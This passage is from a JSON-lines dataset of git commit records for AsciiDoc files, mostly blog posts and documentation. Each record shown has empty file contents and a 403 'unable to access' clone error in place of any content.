z\/elasticsearch,Flipkart\/elasticsearch,andrestc\/elasticsearch,huypx1292\/elasticsearch,StefanGor\/elasticsearch,vietlq\/elasticsearch,pozhidaevak\/elasticsearch,mjason3\/elasticsearch,dataduke\/elasticsearch,scorpionvicky\/elasticsearch,jango2015\/elasticsearch,strapdata\/elassandra,cnfire\/elasticsearch-1,Helen-Zhao\/elasticsearch,khiraiwa\/elasticsearch,adrianbk\/elasticsearch,mmaracic\/elasticsearch,wayeast\/elasticsearch,iamjakob\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,winstonewert\/elasticsearch,kevinkluge\/elasticsearch,HarishAtGitHub\/elasticsearch,cwurm\/elasticsearch,jeteve\/elasticsearch,pranavraman\/elasticsearch,fooljohnny\/elasticsearch,ckclark\/elasticsearch,mcku\/elasticsearch,elancom\/elasticsearch,mbrukman\/elasticsearch,yongminxia\/elasticsearch,loconsolutions\/elasticsearch,wittyameta\/elasticsearch,kunallimaye\/elasticsearch,phani546\/elasticsearch,GlenRSmith\/elasticsearch,hydro2k\/elasticsearch,MichaelLiZhou\/elasticsearch,fred84\/elasticsearch,vvcephei\/elasticsearch,Widen\/elasticsearch,amit-shar\/elasticsearch,ESamir\/elasticsearch,nilabhsagar\/elasticsearch,tsohil\/elasticsearch,mgalushka\/elasticsearch,szroland\/elasticsearch,socialrank\/elasticsearch,ESamir\/elasticsearch,pritishppai\/elasticsearch,kimimj\/elasticsearch,masterweb121\/elasticsearch,mjhennig\/elasticsearch,huypx1292\/elasticsearch,overcome\/elasticsearch,naveenhooda2000\/elasticsearch,achow\/elasticsearch,JervyShi\/elasticsearch,xpandan\/elasticsearch,markllama\/elasticsearch,strapdata\/elassandra-test,rajanm\/elasticsearch,pranavraman\/elasticsearch,iamjakob\/elasticsearch,IanvsPoplicola\/elasticsearch,lzo\/elasticsearch-1,JSCooke\/elasticsearch,Uiho\/elasticsearch,achow\/elasticsearch,smflorentino\/elasticsearch,btiernay\/elasticsearch,gfyoung\/elasticsearch,ouyangkongtong\/elasticsearch,fforbeck\/elasticsearch,btiernay\/elasticsearch,caengcjd\/elasticsearch,kalburgimanjunath\/elasticsearch,onegambler\/elasticsearch,Siddartha07\/elasticsearch,mortonsykes\/elasticsearch,alexkuk\/elasticsearch,nellicus\/elasticsearch,mortonsykes\/elasticsearch,wbowling\/elasticsearch,kenshin233\/elasticsearch,areek\/elasticsearch,tahaemin\/elasticsearch,kingaj\/elasticsearch,amit-shar\/elasticsearch,hirdesh2008\/elasticsearch,AndreKR\/elasticsearch,kunallimaye\/elasticsearch,vingupta3\/elasticsearch,abibell\/elasticsearch,ImpressTV\/elasticsearch,tahaemin\/elasticsearch,himanshuag\/elasticsearch,tebriel\/elasticsearch,Kakakakakku\/elasticsearch,drewr\/elasticsearch,anti-social\/elasticsearch,sauravmondallive\/elasticsearch,diendt\/elasticsearch,clintongormley\/elasticsearch,robin13\/elasticsearch,alexbrasetvik\/elasticsearch,wenpos\/elasticsearch,scottsom\/elasticsearch,mikemccand\/elasticsearch,pranavraman\/elasticsearch,tahaemin\/elasticsearch,gingerwizard\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,myelin\/elasticsearch,jsgao0\/elasticsearch,luiseduardohdbackup\/elasticsearch,kingaj\/elasticsearch,tsohil\/elasticsearch,winstonewert\/elasticsearch,uschindler\/elasticsearch,sdauletau\/elasticsearch,luiseduardohdbackup\/elasticsearch,lks21c\/elasticsearch,rhoml\/elasticsearch,Kakakakakku\/elasticsearch,milodky\/elasticsearch,nazarewk\/elasticsearch,ESamir\/elasticsearch,vietlq\/elasticsearch,yanjunh\/elasticsearch,kevinkluge\/elasticsearch,yynil\/elasticsearch,xuzha\/elasticsearch,iantruslove\/elasticsearch,fooljohnny\/elasticsearch,kcompher\/elasticsearch,kubum\/elasticsearch,aglne\/elasticsearch","old_file":"docs\/reference\/migration\/migrate_2_0.asciidoc","new_file":"docs\/reference\/migration\/migrate_2_0.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"be880ec9aeb3b98ebbc663387f490ba724ad1072","subject":"Update 2016-01-04-JavaScript-Beginner.adoc","message":"Update 2016-01-04-JavaScript-Beginner.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-04-JavaScript-Beginner.adoc","new_file":"_posts\/2016-01-04-JavaScript-Beginner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"8ef255952bed5b8300dee5d384c07a2a2f9c01df","subject":"y2b create post MYSTERIOUS BOX FROM JAPAN","message":"y2b create post MYSTERIOUS BOX FROM JAPAN","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-14-MYSTERIOUS-BOX-FROM-JAPAN.adoc","new_file":"_posts\/2016-07-14-MYSTERIOUS-BOX-FROM-JAPAN.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"a64e0738959374d333f0adfd06d08d005d734d93","subject":"y2b create post How Loud Can It Really Be?","message":"y2b create post How Loud Can It Really Be?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-11-How-Loud-Can-It-Really-Be.adoc","new_file":"_posts\/2016-10-11-How-Loud-Can-It-Really-Be.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"ecab061f811ca5d3858714300c53a77f4d536f85","subject":"Update 2016-04-09-How-to-enable-I-Pv6-routing-on-a-Cisco-router.adoc","message":"Update 2016-04-09-How-to-enable-I-Pv6-routing-on-a-Cisco-router.adoc","repos":"fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly","old_file":"_posts\/2016-04-09-How-to-enable-I-Pv6-routing-on-a-Cisco-router.adoc","new_file":"_posts\/2016-04-09-How-to-enable-I-Pv6-routing-on-a-Cisco-router.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fwalloe\/infosecbriefly.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"a0532e026e19f47468a28a3063230d4a70424507","subject":"y2b create post What Is A Bluetooth Bowl?","message":"y2b create post What Is A Bluetooth Bowl?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-04-20-What-Is-A-Bluetooth-Bowl.adoc","new_file":"_posts\/2016-04-20-What-Is-A-Bluetooth-Bowl.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"6a25282816205d1d958fa4d9e2d8d88e266991af","subject":"Create do-branching-es.adoc","message":"Create do-branching-es.adoc\n\nSpanish translation for do-branching.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do\/do-branching-es.adoc","new_file":"src\/do\/do-branching-es.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"aa47764e5cf68b7b92432a034e4e23137df6a85f","subject":"Update 2016-10-07-a-beginners-writing-guide.adoc","message":"Update 2016-10-07-a-beginners-writing-guide.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2016-10-07-a-beginners-writing-guide.adoc","new_file":"_posts\/2016-10-07-a-beginners-writing-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"432903848817cf57ed0dbc04bf05881a6dba9a99","subject":"Update 2019-01-23-C-P-P.adoc","message":"Update 2019-01-23-C-P-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-23-C-P-P.adoc","new_file":"_posts\/2019-01-23-C-P-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"04d9282b65936fc52fbe24d3d27afaf0b7a23f3b","subject":"Renamed '_posts\/2019-05-21-4-Variable-Elimination-Algorithm-in-Probabilistic-Graph-Inference.adoc' to '_posts\/2019-05-21-Variable-Elimination-Algorithm-in-Probabilistic-Graph-Inference.adoc'","message":"Renamed '_posts\/2019-05-21-4-Variable-Elimination-Algorithm-in-Probabilistic-Graph-Inference.adoc' to '_posts\/2019-05-21-Variable-Elimination-Algorithm-in-Probabilistic-Graph-Inference.adoc'","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2019-05-21-Variable-Elimination-Algorithm-in-Probabilistic-Graph-Inference.adoc","new_file":"_posts\/2019-05-21-Variable-Elimination-Algorithm-in-Probabilistic-Graph-Inference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"7e111928b3544d844e153621f87b1b9db642e9b1","subject":"y2b create post ASUS Vulcan ANC Gaming Headset Unboxing \\u0026 Overview (UGPC 2012)","message":"y2b create post ASUS Vulcan ANC Gaming Headset Unboxing \\u0026 Overview (UGPC 2012)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-08-07-ASUS-Vulcan-ANC-Gaming-Headset-Unboxing-u0026-Overview-UGPC-2012.adoc","new_file":"_posts\/2012-08-07-ASUS-Vulcan-ANC-Gaming-Headset-Unboxing-u0026-Overview-UGPC-2012.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"66efaf044be187bce299d8ecc07a83faa5178fd7","subject":"Wording RS","message":"Wording RS\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"WS client\/JAX-RS client.adoc","new_file":"WS client\/JAX-RS client.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"86f42887742758a3fa2cc2a1848a08231d9583f4","subject":"Delete 2016-02-26-Gantt.adoc","message":"Delete 2016-02-26-Gantt.adoc","repos":"errorval\/blog,errorval\/blog,errorval\/blog","old_file":"_posts\/2016-02-26-Gantt.adoc","new_file":"_posts\/2016-02-26-Gantt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/errorval\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"e4b22730eb71a44241bb80424e3e505f83b7e3d1","subject":"Update 2017-05-03-Intro.adoc","message":"Update 2017-05-03-Intro.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-03-Intro.adoc","new_file":"_posts\/2017-05-03-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"fd64c57c27062ce09b43cb058dfab258014a5d36","subject":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","message":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"0665cf2907eb4384ddc1e11d77aaec8c5c92d74a","subject":"Update 2015-05-06-Hola-Mundo-Leer-Escribir-Main.adoc","message":"Update 2015-05-06-Hola-Mundo-Leer-Escribir-Main.adoc","repos":"Wurser\/wurser.github.io,Wurser\/wurser.github.io,Wurser\/wurser.github.io","old_file":"_posts\/2015-05-06-Hola-Mundo-Leer-Escribir-Main.adoc","new_file":"_posts\/2015-05-06-Hola-Mundo-Leer-Escribir-Main.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Wurser\/wurser.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"aec3813bebbb1da6fe24594cf6bc7ee613e25efc","subject":"Update 2016-02-09-Accelerate-tomcat-78-start-up.adoc","message":"Update 2016-02-09-Accelerate-tomcat-78-start-up.adoc","repos":"tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io","old_file":"_posts\/2016-02-09-Accelerate-tomcat-78-start-up.adoc","new_file":"_posts\/2016-02-09-Accelerate-tomcat-78-start-up.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tcollignon\/tcollignon.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"42dd80b30f2eb5a93ceb1300415c49e6a35b6e71","subject":"Update 2016-09-06-Reverse-a-Singley-Linked-List.adoc","message":"Update 2016-09-06-Reverse-a-Singley-Linked-List.adoc","repos":"rushil-patel\/rushil-patel.github.io,rushil-patel\/rushil-patel.github.io,rushil-patel\/rushil-patel.github.io,rushil-patel\/rushil-patel.github.io","old_file":"_posts\/2016-09-06-Reverse-a-Singley-Linked-List.adoc","new_file":"_posts\/2016-09-06-Reverse-a-Singley-Linked-List.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rushil-patel\/rushil-patel.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"b45b9586df49823e654e2cccee2695b086433750","subject":"Added Forge 3.0.0.Beta3 announcement","message":"Added Forge 3.0.0.Beta3 announcement\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2016-01-21-forge-3.0.0.beta3.asciidoc","new_file":"news\/2016-01-21-forge-3.0.0.beta3.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"}
{"commit":"9aea33fc5e31d3358edeb35b3e5a9fb07bd8e734","subject":"indonesian readme added","message":"indonesian readme added\n","repos":"rafeyu\/dnrdrhc","old_file":"README-id.adoc","new_file":"README-id.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rafeyu\/dnrdrhc.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"2de618e97cfa0e3b7e8f24cd3d628584b59759ff","subject":"Update 2016-10-23-What-is-Machine-Learning.adoc","message":"Update 2016-10-23-What-is-Machine-Learning.adoc","repos":"triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io","old_file":"_posts\/2016-10-23-What-is-Machine-Learning.adoc","new_file":"_posts\/2016-10-23-What-is-Machine-Learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/triskell\/triskell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"9edb2845387ccceab918866a967e31cf893ce67e","subject":"Update 2017-09-17-Sonata-Admin-Custom-Page.adoc","message":"Update 2017-09-17-Sonata-Admin-Custom-Page.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-09-17-Sonata-Admin-Custom-Page.adoc","new_file":"_posts\/2017-09-17-Sonata-Admin-Custom-Page.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"dce1c4675410c80e2325f2f98eff8b0d7491a511","subject":"Update 2017-08-24-Cloud-Front-S3-503-sorry.adoc","message":"Update 2017-08-24-Cloud-Front-S3-503-sorry.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-24-Cloud-Front-S3-503-sorry.adoc","new_file":"_posts\/2017-08-24-Cloud-Front-S3-503-sorry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"64726743e2c4dfa024d311ceba0cb4d67cdc4e7d","subject":"Update 2017-08-24-Cloud-Front-S3-503-sorry.adoc","message":"Update 2017-08-24-Cloud-Front-S3-503-sorry.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-24-Cloud-Front-S3-503-sorry.adoc","new_file":"_posts\/2017-08-24-Cloud-Front-S3-503-sorry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e77d73be55a26e086b8443567c36729509f06044","subject":"Update 2017-03-03-IoT-and-Honey.adoc","message":"Update 2017-03-03-IoT-and-Honey.adoc","repos":"mattdoesinfosec\/mattdoesinfosec.github.io,mattdoesinfosec\/mattdoesinfosec.github.io,mattdoesinfosec\/mattdoesinfosec.github.io,mattdoesinfosec\/mattdoesinfosec.github.io","old_file":"_posts\/2017-03-03-IoT-and-Honey.adoc","new_file":"_posts\/2017-03-03-IoT-and-Honey.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mattdoesinfosec\/mattdoesinfosec.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3cfec5b8a728236313d556a54ddbc01edd0e3793","subject":"Update 2017-07-07-Cloud-Spanner.adoc","message":"Update 2017-07-07-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-07-Cloud-Spanner.adoc","new_file":"_posts\/2017-07-07-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f73f7547426827f98274f6f6b72b1215b9922d5","subject":"Update 2015-06-02-Lab-Noteboo.adoc","message":"Update 2015-06-02-Lab-Noteboo.adoc","repos":"DominikVogel\/DominikVogel.github.io,DominikVogel\/DominikVogel.github.io,DominikVogel\/DominikVogel.github.io,DominikVogel\/DominikVogel.github.io","old_file":"_posts\/2015-06-02-Lab-Noteboo.adoc","new_file":"_posts\/2015-06-02-Lab-Noteboo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DominikVogel\/DominikVogel.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e8826e35ea9bc02311970d122efa23c2c3c7c440","subject":"Update 2016-07-19-Second-Post.adoc","message":"Update 
2016-07-19-Second-Post.adoc","repos":"spikebachman\/spikebachman.github.io,spikebachman\/spikebachman.github.io,spikebachman\/spikebachman.github.io,spikebachman\/spikebachman.github.io","old_file":"_posts\/2016-07-19-Second-Post.adoc","new_file":"_posts\/2016-07-19-Second-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spikebachman\/spikebachman.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"724430687c94e55d3b12f9cff75348e5206a6561","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f9e1529babf79bf46361f82b9c5dcf007791bae3","subject":"Update 2016-12-03-Hello-World.adoc","message":"Update 2016-12-03-Hello-World.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2016-12-03-Hello-World.adoc","new_file":"_posts\/2016-12-03-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08606e72d49a90ce5543558b86866ecfdd143e9d","subject":"Renamed '_posts\/2019-01-31-Java.adoc' to '_posts\/2019-01-31-Java-server.adoc'","message":"Renamed '_posts\/2019-01-31-Java.adoc' to '_posts\/2019-01-31-Java-server.adoc'","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2019-01-31-Java-server.adoc","new_file":"_posts\/2019-01-31-Java-server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff7670d90ad4feb1531023dada383bf5bf530f38","subject":"Update 2019-03-22-A-W-S-C-L-I.adoc","message":"Update 2019-03-22-A-W-S-C-L-I.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-22-A-W-S-C-L-I.adoc","new_file":"_posts\/2019-03-22-A-W-S-C-L-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cef828b544bd57026730a201d1e77e1b4b641474","subject":"Fix formatting and clarify use of searchPaths in config server","message":"Fix formatting and clarify use of searchPaths in config server\n\nSee 
gh-117\n","repos":"royclarkson\/spring-cloud-config,psbateman\/spring-cloud-config,mstine\/spring-cloud-config,rajkumargithub\/spring-cloud-config,fkissel\/spring-cloud-config,spring-cloud\/spring-cloud-config,thomasdarimont\/spring-cloud-config,marbon87\/spring-cloud-config,appleman\/spring-cloud-config,marbon87\/spring-cloud-config,psbateman\/spring-cloud-config,spring-cloud\/spring-cloud-config,spring-cloud\/spring-cloud-config,thomasdarimont\/spring-cloud-config,fangjing828\/spring-cloud-config,mstine\/spring-cloud-config,royclarkson\/spring-cloud-config,fkissel\/spring-cloud-config,mbenson\/spring-cloud-config,royclarkson\/spring-cloud-config,mstine\/spring-cloud-config,rajkumargithub\/spring-cloud-config,fkissel\/spring-cloud-config,shakuzen\/spring-cloud-config,psbateman\/spring-cloud-config,thomasdarimont\/spring-cloud-config,fangjing828\/spring-cloud-config,shakuzen\/spring-cloud-config,shakuzen\/spring-cloud-config,marbon87\/spring-cloud-config,rajkumargithub\/spring-cloud-config,fangjing828\/spring-cloud-config,appleman\/spring-cloud-config,appleman\/spring-cloud-config,mbenson\/spring-cloud-config,mbenson\/spring-cloud-config","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-config.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-config.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomasdarimont\/spring-cloud-config.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a3161dfd96c1680b80fa9330df6ebca534b20f8e","subject":"Update 2015-08-27-Boosting-and-managing-static-files-with-Django.adoc","message":"Update 2015-08-27-Boosting-and-managing-static-files-with-Django.adoc","repos":"joao-bjsoftware\/joao-bjsoftware.github.io,joao-bjsoftware\/joao-bjsoftware.github.io,joao-bjsoftware\/joao-bjsoftware.github.io","old_file":"_posts\/2015-08-27-Boosting-and-managing-static-files-with-Django.adoc","new_file":"_posts\/2015-08-27-Boosting-and-managing-static-files-with-Django.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joao-bjsoftware\/joao-bjsoftware.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df1b9f14aca4a328802adc3c6942929390506543","subject":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","message":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","new_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c81b9a161fcd553022e1bf85a0a601e155e615fc","subject":"Update 2015-02-14-Hello-World.adoc","message":"Update 2015-02-14-Hello-World.adoc","repos":"theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io","old_file":"_posts\/2015-02-14-Hello-World.adoc","new_file":"_posts\/2015-02-14-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/theofilis\/theofilis.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29bba0de4febb776705bbbef97e4c2e1644d9b78","subject":"Update 2015-06-09-Hello-World.adoc","message":"Update 2015-06-09-Hello-World.adoc","repos":"mkc188\/hubpress.io,mkc188\/hubpress.io,mkc188\/hubpress.io","old_file":"_posts\/2015-06-09-Hello-World.adoc","new_file":"_posts\/2015-06-09-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mkc188\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f51b11f3fb0690c79d8acbcb9f9bf8e80bd8e693","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60582f51bc6a01c0b7a0b04b35c5bfa4ca04b262","subject":"Update 2017-05-22-Elo-adasban.adoc","message":"Update 